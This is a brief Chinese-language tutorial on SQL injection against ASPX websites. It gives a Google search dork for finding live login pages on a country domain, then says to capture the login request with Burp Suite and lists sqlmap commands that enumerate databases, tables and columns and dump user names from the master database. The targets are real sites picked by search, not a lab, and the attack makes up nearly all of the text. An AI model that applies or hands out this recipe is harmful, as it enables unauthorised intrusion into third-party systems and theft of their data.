aspx网站注入实战
- 使用谷歌语法:site:. tw inurl:Login.aspx 查找网站 (site是代表国家的代码)
- 找到网页使用语句测试是否有注入
可能存在注入,使用burpsuit抓登录时的包。
将数据拷贝保存到d:/a.txt内。- 使用sqlmap跑包。
sqlmap.py -r d:/a.txt
发现注入 - sqlmap.py -r d:/a.txt --dbs 跑数据库
- sqlmap.py -r d:/a.txt -D master --tables 跑表
- sqlmap.py -r d:/a.txt -D master -T sys.sysusers --columns 跑列
- 愉快的跑数据:sqlmap.py -r d:/a.txt -D master -T sys.sysusers -C name --dump